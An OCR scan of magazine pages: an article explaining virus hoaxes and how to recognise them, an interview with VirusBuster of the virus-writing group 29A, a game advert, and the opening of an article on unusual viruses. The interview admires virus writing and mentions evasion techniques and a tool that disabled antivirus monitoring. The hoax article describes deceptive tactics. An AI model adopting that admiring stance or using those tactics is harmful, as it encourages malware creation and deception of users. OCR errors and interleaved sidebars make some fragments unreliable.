предупреждения они уже никому не 
смогут, поэтому эффективнее про- 
сить сначала разослать предупрежде- 
ния, а потом уже "избавляться от ви- 
руса". Самое смешное, что люди, став- 
шие жертвой собственного легкове- 
рия, описывают происшедшее при- 
мерно так: "Все сделал так, как было 
написано, но, видать, поздно - вирус 
уже успел компьютер испортить". И 
процесс продолжается - "жертвы ви- 
руса" демонстрируют всем желающим 
черные экраны мониторов с надписью 
"Boot Sector Failed", свидетели в ужа- 
се спешат домой удалять зловредные 
файлы. А особо бдительные гражда- 
не считают своим долгом прислать 
файлы с "вирусом" тов. Касперскому 
и прочей антивирусной братии. Весе- 
ло, наверное, получать в день тысяч 
десять config.sys'oB. 


Ты удивляешься, почему так много 
людей ведутся на это? Есть хорошая 
книга - "Первое правило волшебника" 
(Т. Гудкайно). Знаешь, в чем это пра- 
вило заключается? "Люди глупы, их 
можно заставить поверить любой 
лжи либо потому, что они хотят в нее 
верить, либо потому, что боятся, что 


она окажется правдой". Вот этим-то 
принципом и пользуются на полную 
катушку некоторые личности, в уго- 
ловном кодексе РФ именуемые злоу- 
мышленниками. Причем сначала ра- 
ботает вторая часть: юзер боится, что 
это может оказаться правдой, и что, 
пропустив мимо ушей предупрежде- 
ние, он обречет себя на медленную и 
мучительную смерть. А после самос- 
тоятельного "лечения" в дело вступа- 
ет первая часть: всегда ведь удобнее 
думать, что компьютер не работает не 
из-за собственных кривых рук, а из-за 
"таинственного вируса, написанного 
на языке Ассемблера для IBM РС". 
Кстати, отказ от подобного способа 
мышления есть первый шаг на долгом 
пути от юзера к хакеру. 


ры 
a 


Lp ta ре PO 


—_ 
Многострадальный AOL... 


HE ТЫ ОДИН УМНЫЙ 

ш Ты, конечно, думаешь, что, прочи- 
тав все это, никогда в жизни не попа- 
дешься на подобную провокацию и 
будешь встречать такие письма в сво- 
ем ящике со снисходительной усмеш- 
кой. А знаешь, какой второй шаг на 
пресловутом пути от юзера к хакеру? 
Осознание того, что не ты один такой 


умный (и принятие мер к исправле- 
нию этого досадного сракта). Так что 
вот тебе второй способ обратить мис- 
тификацию в реальный вред. 


Все помнят басню про пастуха-ве- 
сельчака? Про того, который овец пас 
и развлекался, крича "Волки овец ре- 
зать пришли!" Народ выбегает, а вол- 
ков нет. И так раза три. А когда и 
впрямь волки пришли, пастух там гор- 
ло надрывал, надрывал, да так никто 
и He пришел... То же самое и с вируса- 
ми. Улеглась шумиха вокруг слухов о 
сверхразрушительном и, естественно, 
необнаружимом вирусе, скрывающем- 
ся в файле sulfnbk.exe. Все уже начи- 
тались опровержений от Касперского, 
посмотрели новости по ОРТ, посмея- 
лись над своими страхами и успокои- 
лись. А злые черти из вирмейкерской 
группы "Последняя осень мира" взя- 
ли и написали настоящий вирус, наз- 
вали его sulfnbk.exe и пустили в Сеть. 
И что мы видим? Массы зараженных, 
с усмешкой закрывающих окошко 
Доктора Веба с текстом "Virus detect- 
ed in sulfnbk.exe": дескать, нет, второй 
раз не купимся. 


Известны также случаи, когда нес- 
колько абсолютно разных программ 
имели одно и то же название - это 
вводило пользователей в заблужде- 
ние и порождало панику. Так в 1997 
году имела место вирусная мистифри- 
кация вокруг программы AOL4Free. 
На самом деле программ было две: 
первая предоставляла бесплатный 
(естественно, нелегальный) доступ к 
AOL, а вторая была самым настоящим 
трояном. Путаница в названиях и воз- 
никшие на основе этого противоре- 
чия привели к возникновению оче- 
редной мистификации. 


ПАМЯТКА . 
ДЛЯ ПОЛЬЗОВАТЕЛЕЙ AOL 

и Теперь пришла пора поговорить о 
том, как же все-таки не стать жертвой 
обмана. Есть, конечно, много методик, 
начиная от "не пользоваться элект- 
ронной почтой", заканчивая "каждое 
полученное письмо отправлять AV- 
мейкеру". По вполне понятным причи- 
нам ты, вероятно, пойдешь другим пу- 
тем: научишься отличать провокацию 
от реальных предупреждений. Навер- 
ное, всем уже и так все понятно, но 
систематизация - великая вещь, поэ- 
тому давай соберем все в кучу под 
названием "Мануал по борьбе с мис- 
тификациями": 
- если на твой адрес пришло письмо 
лично от Гейтса с дружеским предуп- 
реждением о новом вирусе - смело 
удаляй его, Билл ничего не делает 
бесплатно :), и если только ты не под- 
писан на его "сверхэффорективную 
программу борьбы с вирусами всего 
за $799", то такого письма тебе никог- 
да не придет; 
- если тебе пришло письмо с твоего поч- 
тового сервера, есть повод слегка нас- 


торожиться и сходить на их сайт или на 
сайт антивирусника: если это действи- 
тельно настоящее предупреждение, в 
новостях будет об этом сказано; 

- обрати внимание на оформление 
письма. Надеюсь, за долгие годы 
борьбы со спамом ты научился не ве- 
рить призывам, написанным больши- 
ми буквами с кучей восклицательных 
знаков; 

- обрати внимание на тон письма. Ес- 
ли в письме применительно к вирусу 
встречаются приставки "супер", 
"ультра" и "сверх", тебя явно грузят; 
- обрати внимание на технические 
подробности. Если в послании гово- 
рится, что новый вирус написан на 
Visual SQL++ .МЕТ, оснащен системой 
эхолокации и встроенным токоприем- 
ником - ты знаешь, где у тебя Trash. 
Ярким примером может служить упо- 
мянутый выше Good Times - в пись- 
мах-предупреждениях говорилось, 
что вирус выводит из строя процес- 
сор, заставляя его выполнять "беско- 
нечный бинарный цикл п-ой сложнос- 
ти". Хотя, конечно, на самом деле, на- 
go обращать внимание даже на менее 
грубые ошибки; 

- если тебя просят разослать это со- 
общение своим знакомым - это 100% 
подстава; 

- если тебя просят удалить какой-то 
файл или подправить реестр, см. вы- 
ше, насчет Trash. 
аки 


Г ЕН А мая 


` Враг не дремлет! = | не дремлет! 


ГДЕ ПОЛУЧИТЬ ДОСТОВЕРНУЮ 
ИНФОРМАЦИЮ? 

m Новости о вирусных мистисфика- 
циях, подтверждения и опровержения 
есть на любом серьезном антивирус- 
ном сайте. Я лично за подобной ин- 
срормацией хожу на F-Secure.com и 
Viruslist.com. 


ee 


— 
Оперативно и достоверно, но на 
английском 


Если же тебе нужна не скупая сводка, 
вроде "это провокация, не верьте", а 
интересная информация, подробнос- 
ти ит.9д., стоит заглянуть по следую- 
щим двум адресам: 


Куча информации, довольно часто 
обновляется 


1. Vmyths.com, "Все о вирусных мисти- 
сфикациях" (на английском). Ресурс 
интересен тем, что обычно предостав- 
ляет хороший анализ происшедших 
мистификаций: почему обман удался, 
почему слух распространился так 
быстро и т.п. Кроме того, автор выдви- 
гает довольно любопытные предполо- 
жения относительно политики веду- 
щих антивирусных компаний - он счи- 
тает, что крупные фирмы, занимаю- 
щиеся разработкой средств защиты 
от вирусов, сами используют более 
совершенное программное обеспече- 
ние, чем предлагают клиентам. При- 
чем на сайте приводятся довольно 
убедительные доказательства. 


История мистификаций, тексты 
предупреждений и много чего еще 


2. Hoaxbusters.ciac.org, "Охотники за 
провокациями" (на английском). Есть 
раздел про историю компьютерных 
мистификаций, их классисикацию и 
методы противодействия. Хороших 
сайтов, посвященных вирусным мис- 
тиффикациям, в рунете, к сожалению, 
нет. Максимум, что ты сможешь найти 
- статьи вроде этой да десяток сове- 
тов от Касперского. 


НАПОСЛЕДОК 

и Тебе может показаться, что вре- 
мя, когда вирусные мистификации 
вводили в заблуждение тысячи че- 
ловек, безвозвратно прошло. Ведь 
на страже нашего спокойствия де- 
сятки антивирусных компаний и сот- 
ни новостных сайтов, готовых изоб- 
личить очередную провокацию. Но 
это не так. Самое уязвимое звено в 
любой системе - человек. Недаром 
Митник так гордился своим умением 
общаться с людьми. И вирусные мис- 
тиффикации - как раз тот случай, ког- 
да умело подобранные слова могут 
принести больше вреда, чем все ви- 


=r 


русы мира. = 


Если на 
твой адрес 
пришло 
письмо лич- 
но от Гейт- 
са с дру- 
жеским пре- 
дупрежде- 
нием о но- 
вом вирусе 
- забей, 
Билл ничего 
не делает 
бесплатно... 


indwOrk 


ИНТЕРВЬЮ С VIRUSBUSTER'OM ИЗ 29А \ 


ИНТЕРВЬЮ 


VIRUSBUSTER ИЗ 29А 


VIRUSBUSTER: 


"УХ-СЦЕНА - 


CAKC™ 


... не стоит 
называть 
что-либо 
невозмож- 
ным. Лучше 
сказать, 
что пока 
этого еще 
не сделали. 


Все мембе- 
ры 29A яв- 
ляются 
лучшими в 
мире вирус- 
кодерами. 


mindwOrk: Привет. Ну 
что, приступим? 
VB: Поехали. 


mindwOrk: Для начала расскажи нем- 
ного о себе. Как зовут, сколько лет, 
где живешь, где работаешь, холост 
или женат, а также чем интересуешь- 
ся и как относишься к жизни? 

УВ; Зовут меня Луис, мне 29 лет. На 
данный момент проживаю в Испании, 
работаю в компьютерной области. 
Женат, и жена моя, пожалуй, являет- 
ся моим главным интересом. Еще кол- 
лекционирую вирусы, люблю играть 
на гитаре, выезжать на пикник, хо- 
дить в кино, читать книги (особенно 
Стивена Кинга и Артура Конан Дойла) 
и слушать музыку (блюз). А мой жиз- 
ненный принцип можно сформулиро- 
вать так: "Если проблема имеет реше- 
НИЕ - зачем тогда беспокоиться? И ес- 
ли решения нет - тем более, на фиг 
забивать голову ерундой". 


mindwOrk: Расскажи, как ты подсел на 
компы. И как у тебя возник интерес к 
компьютерным вирусам. 

УВ: Где-то в районе 1984 г. у моего ку- 
зена появился ZX Spectrum, после 
этого я стал намного чаще захажи- 
вать к нему в гости. Мы днями напро- 
лет пуляли в разные игрушки и даже 
не пытались вникнуть во что-то кроме 
них. Первые попытки освоить прог- 
раммирование я преддпринял в стар- 
ших классах школы. Ничего серьезно- 
го - так, ламерские программки на 
Бейсике и Коболе, эксперименты с ас- 
семблером. Гораздо сильнее, чем 
программированием, я увлекался со- 
биранием вареза. Искал и скачивал 
все, что только можно, и аккуратно 
складировал на дискетах. Через ка- 
кое-то время я познакомился с 
Gordon Shumway - человеком, кото- 
рый помог мне основать и координи- 
ровать работу Dark Node BBS. Именно 
он открыл для меня такое явление, 
как компьютерные вирусы. У него тог- 
да была небольшая коллекция вирей, 
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рис. Константин Комардин 


Я не пишу вирусов и никогда их не писал. 
По правде сказать, я не ахти какой кодер. 


имы вместе с интересом ее изучали. 
Со временем Гордон рассказал мне 
обо всем, что знал сам, после чего 
мой интерес к вирусам окреп и вылил- 
ся в одно из главных увлечений в 
жизни. В 1994 г.у меня дома появился 
интернет. Чтобы наполнить свою ВВ$ 
свежим варезом, я стал активно сер- 
фить по разным сайтам и таким обра- 
зом узнал о вирус-сцене. С этого все и 
началось. 


mindwOrk: Сколько вирусов ты уже 
успел зарелизить? 


УВ:Я не пишу вирусов и никогда их 
не писал. По правде сказать, я не ах- 
ти какой кодер. Мне даже приходи- 
лось обращаться к друзьям, когда 
нужно было написать какую-то прог- 
рамму. Тем не менее, я люблю изу- 
чать компьютерные вирусы и разра- 
батывать для них новые алгоритмы, 
которыми потом делюсь со своими 
друзьями-вирусмейкерами. В 1998 г. 
я приступил к написанию утилиты 
для сортировки вирей. Этот проект 
под названием VS2000 побудил ме- 
ня более серьезно отнестись к изу- 


чению программирования. Мне хоте- 
лось написать программу самостоя- 
тельно, ведь как там: "Хочешь, что- 
бы что-то было сделано хорошо - 
сделай это сам". С тех пор я больше 
не обращаюсь к кодерам за по- 
МОЩЬЮ :). 


mindwOrk: В одном \Х-чарте тебя наз- 
вали коллекционером вирусов номер 
один в мире. Сколько экземпляров 
сейчас в твоей коллекции? Насколько 
часто она обновляется? Где хранится 
и сколько весит? Есть ли у тебя 
эксклюзивные вещи, которых ниу ко- 
го больше нет? Какие из твоих питом- 
цев наиболее опасны? 

VB; Сейчас в моей коллекции 400 ты- 
сяч файлов, примерно 100 тысяч - 
уникальных (то есть не модификации 
одной и той же программы). Среди них 
вирусы, черви, трояны, бэкдоры и 
прочие подобные вещи. Все вместе 
это занимает 2,5 гига на моем винте и 
6 сидюков. Коллекция обновляется 


VX scene. Для многих вирусмейкеров 
ОМ стала местом релиза своих проек- 
тов. Однажды, в далеком 1995 году, 
мы с Гордоном решили собрать все, 
что было зарелизено членами борбы, 
и создать на основе этого материала 
журнал, подобный 40-Hex. 29A изна- 
чально не была вирус-группой. 29А - 
это название журнала, а также груп- 
пы людей, причастных к его созда- 
нию. Мы просто объединились вместе 
с одной целью - донести до людей ин- 
срормацию и программы, написанные 
постоянными посетителями Dark 
Node. Сделать это посредством жур- 
нала. Такая вот ситуация сохраняется 
go сих пор. 


mindwOrk: Кто сейчас числится в сос- 
таве 29А? Небольшой комментарий о 
каждом мембере. 

УВ; Super, Vecna, ZOMBIE, Ratter, 
Benny, Mental Driller, GriYo, roy g biv, 
VirusBuster. От комментариев, извини, 
воздержусь. 


Все мемберы 29A 
являются лучшими 
в мире вирус-кодерами. 


Группа 29А 


почти каждый день, в основном пос- 
редством трейдинга с другими VX-col- 
lector'amu. Помимо распространенных 
и хорошо известных зверьков, у меня 
есть и очень редкие экземпляры, а 
также эксклюзивы. Самый опасный 
вирь в коллекции - конечно же, СН. 
Ведь он поганит железо. Большая 
часть моей подборки вирей - публич- 
ная, но есть и скрытая, приватная 
часть. Приват я держу для себя и ни с 
кем им не делюсь. 


mindwOrk: Насколько я знаю, ты уже 
несколько лет состоишь в группе 29А 
- одной из самых авторитетных и ува- 
жаемых в \/Х-комьюнити. Расскажи о 
ней поподробнее. Для начала, как она 
появилась, и что собой представляет 
сейчас? 

УВ; Первоначальный состав группы 
29А сформировался внутри Dark 
Node BBS. В то время станция была 
уже полностью посвящена вирусам, и 
участие в дискуссиях на ней принима- 
ли многие известные представители 


mindwOrk: Насколько высок уровень 
профессионализма в 29А? 

VB: Bce мемберы 29А являются луч- 
шими в мире вирус-кодерами. Един- 
ственный НЕ кодер - это VirusBuster. Я 
занимаюсь организационными вопро- 
сами, редакторствую и администри- 
рую наш официальный сайт. Плюс по 
мелочи. 


mindwOrk: Какая атмосфера царит 
внутри группы? Как вы контактируете 
и знаете ли друг друга в риаллайфе? 
УВ: Атмосфера очень дружественная, 
отношения - отличные. Так как живем 
мы в разных городах и странах, соб- 
раться в рл вместе не получается. По- 
этому общаемся в основном посред- 
ством электронной почты. Хотя, GriYo 
знает лично большинство мемберов 
29А. Обычно работа индивидуальная. 
Каждый знает свое дело и делает его 
самостоятельно. Объединяемся мы 
незадолго до релиза журнала. В такое 
время мы все вместе решаем, какие 
статьи включить в 29А e-zine и какие 
вирусы зарелизить. 


mindwOrk: Есть nn у вас какие-то фор- 
мальные правила, которых должен 
придерживаться каждый мембер? 
УВ: Ничего официального. Основным 
требованием является активность. То 
есть, если ты в 29А, то должен каким- 
то образом вносить свой вклад - 
участвовать в наполнении журнала, 
релизить новые работы под лейблом 
29А. Если человек ничего не делает, 
вряд ли он останется в команде. 


mindwOrk: Насколько активна 29А се- 
годня? Над какими проектами вы сей- 
час работаете? 

VB: Основное наше детище - 29А 
virus e-zine, который выходит с перио- 
дичностью 1 выпуск в год. Такая заде- 
ржка связана с тем, что делать каче- 
ственный журнал о вирусах сейчас 
не так-то легко. А все мемберы 29А 
очень требовательны к качеству то- 
го, что они делают. К тому же мы хо- 
тим, чтобы издание было максималь- 
но насыщенным и информативным. К 
этому моменту мы выпустили 6 номе- 
ров, и сейчас в разработке находится 
29А #7. 


mindwOrk: Расскажи поподробнее о 
процессе создания вашего журнала. 
УВ: 29A e-zine - это смысл существо- 
вания группы. Группа 29А живет для 
того, чтобы делать журнал 29А. На 
создание нового выпуска уходит мно- 
го времени и усилий. И все, что мы 
имеет взамен - нулевая или даже не- 
гативная реакция от \УХ-сцены. Боль- 
шая часть материалов - технические 
статьи о том, как делать вирусы. В 
последних выпусках мы также публи- 
куем тексты об уязвимостях в сетях. 
Многие мемберы 29А считают, что бу- 
дущее вирусмейкерства напрямую 
связано с хакерством и сетевыми ба- 
гами. Мы собираемся делать журнал и 
дальше, выпустить как можно больше 
номеров. Кстати, участие в наполне- 
нии 29А mag принимают не только 
члены нашей команоы, но и другие 
квалифицированные вирусмейкеры. 


mindwOrk: Назови самые известные 
вири, выпущенные парнями из 29А. 
УВ; Таких много. В качестве примера 
могу назвать Hybris от Vecna и 
Marburg от GriYo. 


mindwOrk: Насколько велико внима- 
ние к вам антихакерских и антивирус- 
ных организаций? Был ли кто-то из 
29А когда-нибудь арестован? Вооб- 
ще, были ли у вас какие-нибудь проб- 
лемы, возникшие из-за вашей вирус- 
ной деятельности? 

VB: Мы знаем, что американское (и, 
скорее всего, не только американс- 
кое) правительство скрытно присмат- 
ривает за VX scene. Однако пока нет 
причин считать, что конкретно 29А 
находится под наблюдением. Случаи, 


когда человека арестовывали за со03- у 


Визуальное проявление вируса 
MARBURG 


Оказывает- 
ся, инфор- 
мация про 
утилиту на 
нашей бор- 
де дошла до 
Евгения 
Касперско- 
го, ион не 
поленился 
сделать Ях 
своего про- 
дукта. Да 
еще и бук- 
вально по- 
казал язык 
нам - ви- 
русмейке- 
рам :). 
Классные 
были вре- 
мена... 


Самый 
опасный 


вирь в кол- 
лекции - 
конечно же, 
сн. 


... даже тог- 
да 29А бы- 
ла зе бест 
:). 


VX-cyena 
уже практи- 
чески не су- 
ществует. 
Просто куч- 
ка людей 
треплется 
на несколь- 
ких каналах 
IRC и поте- 
шается над 
теми, кто 
пытается 
влиться, 
что-то уз- 
нать. 


AVP scan- 
ning in 
memory for 
viruses... 
Memory 
modified at 
1234:5678 
= ;=) 

г 


Женат, и 
жена моя, 
пожалуй, 
является 
моим глав- 
ным инте- 
ресом. 


ИНТЕРВЬЮ С VIRUSBUSTER'OM ИЗ 29А | 


Сайт-библия вирмейкера 


| 


29A - это группа людей, живущих 
в совершенно разных частях мира 
(Испания, Чехия, Россия, Бразилия etc). 


дание вирусов, можно пересчитать 
по пальцам. Еще меньше тех, кого за 
это наказывали: автор вируса Smeg 
(не помню имени), Дэвид Л. Смита 
aka VicodinES, Simon Vallor - автор 
Goner'a. В нашей группе ни один мем- 
бер не имел и не имеет проблем с за- 
коном (постучал по дереву). Мы не 
пишем деструктивные вирусы и 
очень серьезно относимся к своей 
privacy. Вся внутренняя переписка 
проходит исключительно в зашифро- 
ванном виде. 


mindwOrk: Вы все квалифицирован- 
ные специалисты в области вирусов, 
наверняка ваш профессионализм 
может заинтересовать легальные ор- 
ганизации. Поступали ли к вам ка- 
кие-нибудь предложения по поводу 
работы? 

УВ; Этот вопрос может пойти в разрез 
с privacy членов 29А. Чтобы на него 
ответить, мне нужно спросить согла- 
сия остальных мемберов. 


mindwOrk: Принимает ли 29А участие 
в вирусных конференциях и тусовках 
вирмейкеров? Если да, были ли ка- 
кие-то доклады от вас? 
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VB: 294A - это группа людей, живущих 
в совершенно разных частях мира 
(Испания, Чехия, Россия, Бразилия 
etc). Поэтому полным составом соби- 
раться мы не можем. Индивидуально - 
конечно, посещаем, причем некото- 
рые мемберы действительно готовили 
небольшие доклады по вирусам. Са- 
мая большая \Х-тусовка, в которой 
приняла участие 29А, прошла в Мад- 
риде в 1998 г. Тогда собралась куча 
народу и всем было весело. До сих 
пор вспоминаю о том времени с удо- 
вольствием. Еще неплохая встреча 
вирусмейкеров была в 1999 г. в Амс- 
тердаме. 


mindwOrk: Многие называют 29A луч- 
шей в мире вирусмейкерской группой. 
Согласен ли ты с этим? Какие еще V X- 
группы могут претендовать на такой 
титул? 

VB: Вообще-то сейчас не так уж и 
много групп, чтобы проводить рейтин- 
ги. Несколько лет назад, когда !КХ или 
The Matrix были активны, еще можно 
было. Эти команды всегда были на 
высоте. Хотя даже тогда 29А была зе 
бест :). Кроме этих двух групп, я нико- 
го не вижу. Тем более, сейчас. 


mindwOrk: Как сейчас обстоят дела с 
VX scene? Насколько она велика, ка- 
кая атмосфера царит внутри? Какой 
она обещает стать в будущем? 

УВ:Я думаю, \УХ-сцена уже практичес- 
ки не существует. Просто кучка людей 
треплется на нескольких каналах IRC 
и потешается над теми, кто пытается 
влиться, что-то узнать. Атмосферу ни- 
как нельзя назвать дружелюбной. В 


сообществе вирусмейкеров полно за- 
вистливых и ревнивых людей. Некото- 
рые - просто мерзкие типы. Строят из 
себя непонятно что, сидят на ирке и 
банят неугодных ньюбисов. Короче 
говоря, VX сцена сейчас - сакс. Что ка- 
сается будущего... может ли все быть 
еще хуже, чем сейчас? Будем наде- 
яться, что это невозможно. 


mindwOrk: И все-таки, расскажи о сво- 
их самых счастливых воспоминаниях, 
имеющих отношение к \Х-сцене. 

УВ; Все они относятся к тому времени, 
когда мы обитали Ha IRC серваке 
Hispano. Это были золотые годы сце- 
ны. Когда Jacky Qwerty, Inti3h, SSR, и 
многие другие отличные вирускодеры 
общались и тусовались вместе. Когда 
не было всего того, что присуще сов- 
ременной "сцене". 


mindwOrk: А как насчет h/p/c/w? Нас- 
колько ты осведомлен о состоянии 
этих сообществ? 

УВ; Когда-то я был софтварным кра- 
кером, но в группах не состоял. У ме- 
ня также было несколько друзей сре- 
ди кракеров, хотя я уже давно с ними 
не поддерживаю связь. Честно гово- 
ря, об этих сообществах я знаю нем- 
ного. Поэтому высказывать свое мне- 
ние о них не буду. 


mindwOrk: Что нужно gna того, чтобы 
создать ХОРОШИЙ вирус? 
VB: TBopyeckoe воображение. 


mindwOrk: A реально рулезный ви- 
рус? 

УВ: Хмм... вирус, который проникнет на 
компьютер Евгения Касперского так, 
что Евгений об этом не узнает, думаю 
вполне можно назвать рулезным :). 


mindwOrk: Какие сейчас наиболее 
продвинутые техники, используемые 
вирмейкерами? 

УВ: EPO и способности к MeTamopopy. 


mindwOrk: Как ты думаешь, какие 
платформы в будущем станут новым 
полигоном для вирей? 

УВ: Сложно сказать. Компьютерные 
технологии сейчас постоянно меняют- 
ся. То, что сегодня правит миром, 
завтра может уже быть бесполезным 
и забытым. Имхо, ближайшее буду- 
щее вирей останется за виндами (как 
обычно) и Мпих. 


Компьютер основателя 29А 
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"Лучшие" вирус, червь и вирусмейкер, 
я думаю, просто не существуют. 
В смысле тут слово "лучший" неуместно. 


Как ты думаешь, можно ли 
создать вирус, который не сможет об- 
наружить и вылечить ни один антиви- 
рус? 

Думаю, это возможно. Я вообще 
считаю, что не стоит называть что-ли- 
бо невозможным. Лучше сказать, что 
пока этого еще не сделали. 


Твое мнение об антивирус- 
никах? Насколько хорошо они делают 
свою работу, и какая из сторон выиг- 
рывает на данный момент? 

Они востребованы, так что, по-мо- 
ему, ничего плохого в этом нет. Эти 
ребята поднимают легкие деньги, в то 
время как \/Х-сцена умирает. Старая 
гвардия постепенно покидает сцену, 
но прийти ей на смену некому. Новое 
поколение ленится изучать ассемб- 
nep, штампуя похожие друг на друга 
VBS-, макро- и ВАТ-вирусы. А то и 
просто использует программы вирус- 
генераторы. Так что, к сожалению, по- 
ка победа находится на стороне анти- 
вирусной братии. И чем дальше, тем 
все становится хуже. 


Лучшие, на твой взгляд: 
вирус, червь, вирусмейкер, VX zine, 
VX сайт, VX-Tyca и антивирус? 

"Лучшие" вирус, червь и вирус- 
мейкер, я думаю, просто не существу- 
ют. В смысле тут слово "лучший" неу- 
местно. Лучший журнал - это, без сом- 
нения, 29А. Сайт - VX Heavens 
(http://vx.netlux.org). Хороших тусовок 
вирусмейкеров уже нет, но из прош- 
лых лучшая, как я уже говорил - та, 
что проходила в Мадриде в 1998 г. Из 


антивирусных программ отдаю свой 
голос AVP и RAV. 


Как твоя жена относится 
к твоему маленькому хобби (коплек- 
ционирование вирей и создание 
журнала)? 
Она счастлива, если счастлив я. 
Поэтому никаких претензий с ее сто- 
роны нет. 


Напоследок расскажи ка- 
кой-нибудь забавный случай из жиз- 
ни 29А, который ты вспоминаешь с 
улыбкой. 

Несколько лет назад, году в 95, 
мы выложили на DarkNode BBS новый 
антивирус Antiviral Toolkit Pro v 2.0 
для DOS. Все тогда с интересом взя- 
лись за его изучение, а один кодер 
написал простенькую сосфтину, отк- 
лючающую резидентный антивирус- 
ный монитор. Примерно в то же время 
дистрибьютор AVP во Франции и Ис- 
пании Герард Мэниг подключился к 
нашей Oopge. Он узнал о программе, 
отключающей монитор, и скачал ее 
потестить. Некоторое время спустя у 
нас оказался новый релиз AVP - 2.2. 
Так вот, когда мы запустили вышеупо- 
мянутую утилиту на нем, на экране тут 
же появилась надпись: "AVP scanning 
in memory for viruses... Memory modi- 
fied at 1234:5678 - ;-)". Оказывается, 
информация про утилиту Ha нашей 
борде дошла до Евгения Касперского, 
и он не поленился сделать fix своего 
продукта. Да еще и буквально пока- 
зал язык нам - вирусмейкерам :). 
Классные были времена... I. 
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Новое слово в жанре! Свежая кровь Ha старые 
дрожжи! Великобритания подарила нам давно 
забытое ощущение новизны, радость знакомства 
с неизведанным, счастье исследовательского 
любопытства, и все это — знаменитая 
"Республика". Благодаря компании "Новый Диск", 
российскому издателю проекта, вы сможете про- 
читать самый свежий эксклюзивный обзор игры! 


"Стране Игр" посчастливилось наложить руки на 
ргемем-версию ярчайшего ЕР$ во вселенной 
Warhammer 40K. Читайте отчет о нашем 
знакомстве с потрясающим проектом от ТНО и 
Kuju Entertainment. 


Сколько мы о нем писали. Перестукин, Торик, 
Инин — ярчайшая плеяда игровой журналистики 
освещала вехи зарождения и роста самого шум- 
ного российского проекта последних лет. И вот 
дождались — избалованный вниманием кра- 
савчик в наших руках. Читайте и наслаждайтесь! 


Главный файтинг года готов появиться на 
просторах нашей страны! А мы, соответственно, 
не отстаем и выкатываем вам полноформатный 
отчет о сиквеле редакционного фаворита. 


Суперэксклюзив! Только у нас! Интригующая и 
долгожданная! Желанная и недоступная! Обзор 
одной из самых заметных игр 2003 года для РС. 


Республика: Революция (Republic: The 
Revolution) e Warhammer 40K: Fire Warrior e 
Soul Calibur Il e Kreed e TRON 2.0 e Jak Il e 
Aliens vs Predator: Extinction e Robotech 
Battlecry e Age of Wonders: Shadow Magic e 
Disciples II: The Servants of the Dark 
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Докучаев Дмитрий aka Forb (forb@real.xakep.ru) 


ИКОВИННЫЕ ВИРУСЫ | 


ДИКОВИННЫЕ 
ВИРУСЫ 


НЕСТАНДАРТНАЯ ЗАРАЗА ДЛЯ СТАНДАРТНЫХ ВЕЩЕЙ 


КОМПЬЮТЕРНЫЕ 


МИСТИФИКАЦИИ 


ш Прежде чем перей- 


Компьютер- 
ные мисти- 


фикации 
представля- 
ют собой 
злую шут- 
ку, которая 
распростра- 
няется в 
Сети через 
WWW или 
e-mail. 
Пользы от 
такой зара- 
зы никакой, 
злоумыш- 
ленники 
преследуют 
лишь одну 
цель - расп- 
ростране- 
ние. 


Компози- 
ция, содер- 
жащая в се- 
бе звук и 
небольшой 
скрипт, поз- 
воляющий 
открывать 
большое 
число 
рорир-око- 
шек, были 
сделаны в 
формате 
wma. Затем 
файл был 
переимено- 
ван в mp3. 
Из-за того, 
что проиг- 
рыватель не 
обращает 
внимания на 
несоответ- 
ствие рас- 
ширений, 
становилось 
возможным 
распростра- 
нять этот 
вирус. 


ти к прикладным ве- 
щам, нужно рассмот- 
реть один подвид диковинных вирей 
- компьютерные мистификации. Они 
представляют собой злую шутку, ко- 
торая распространяется в Сети че- 
рез WWW или e-mail. Пользы от та- 
кой заразы никакой, злоумышленни- 
ки преследуют лишь одну цель - 
распространение. Наивные юзеры, 
думая, что пересылкой ложного 
письма обезопасят глобал от виру- 
са, исполняют роль переносчика 
электронной заразы в Сети. 


Несмотря на отдаленность от вируса, 
такая зараза сфиксируется на электрон- 
ных страницах вирусных энциклопедий. 
Вот некоторые примеры злых шуток: 


GoodTimes. Псевдовирус распростра- 
нялся по сетям в начале 1994 года в 
виде небольшого электронного пись- 
ма, гласившего, что в интернете бушу- 
ет вирус Good Times, его необходимо 
сразу удалить. Это письмо вызвало 
панику среди пользователей, потому 
как до этого ничего подобного не наб- 
людалось. Лишь к началу 1995 года 
псевдовирус потерял свою актуаль- 
ность. Хотя представитель компьютер- 
ной мистификации побывал на реко- 
раном количестве рабочих машин. Это 
принесло ему огромную популярность. 


Join The Crew. Этот псевдовирус по- 
явился чуть позднее, в начале 1997 
года. Он распространялся также по 
электронной почте и сообщал о том, 
что в Сети якобы запущен опасный 
вирус Join The Crew, уничтожающий 
все файлы Ha носителях. Письмо ин- 
‹формировало пользователя о TOM, 
что при получении подобного вируса 
по почте, его необходимо сразу уда- 
лить. В приписке говорилось: обяза- 
тельно перешли это письмо всем лю- 
дям в адресной книге, чтобы заранее 
их предупредить об опасности. Конеч- 
но, такие рассылки рассчитаны только 
на непрофессиональных пользовате- 
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лей интернета. К счастью для злоу- 
мышленников, таких в глобале бес- 
счетное множество. 


Пару лет назад по Сети гулял более 
продвинутый псевдовирус. Он гово- 
рил получателю, что в его системе 
обнаружена зараза и ее стоит уда- 
лить. Но прежде чем это сделать, 
следует переслать мыло максималь- 
ному количеству людей. Как ты, на- 
верное, догадался, в письме просят 
стереть важную виндовую библиоте- 
ку, после чего работа в системе бу- 
дет невозможна. 


Подобными письмами пересылают не 
только инфу о заразе. Задиксирова- 
ны случаи построения целых дфинан- 
совых пирамид через почтовые сооб- 
щения (текст письма в этом случае 
выглядит подобно следующему: пе- 
решлите $10 по двум адресам, и будет 
вам счастье ;)). А о любовных письмах 
и "счастливых" рассылках я вообще 
молчу - каждый, наверное, их получал. 


Помимо почтовых шуток, к мистифри- 
кациям относят и обычные програм- 


мы-приколы, которые при запуске вы- 
водят на экран определенный текст 
либо проигрывают музыку. Такие тво- 
рения были занесены в базу AVP. На 
первый взгляд это кажется бессмыс- 
ленным, но разработчики антивирус- 
ного ПО нашли целых 2 причины, по 
которым программы такого рода ge- 
тектируются AVP. 

@. Предотвращение многократной 
посылки программы-шутки в антиви- 
русную лабораторию AVP. После об- 
наружения подобной программы 
пользователь шлет ее специалистам, 
gO конца не разобравшись в том, что 
софтина не представляет для него 
особой опасности. Из-за шквала по- 
добного мусора, работники лаборато- 
рии были вынуждены занести такие 
проги в антивирусную базу. 

@. Для улучшения качества про- 
дукта. Пользователи, которые посе- 
щают архивы с коллекцией прог- 
рамм-шуток, нередко замечают, что 
создатели файлов пишут о невоз- 
можности детектирования антиви- 
рем. Чтобы быть "впереди планеты 
всей", такие творения были внесены 
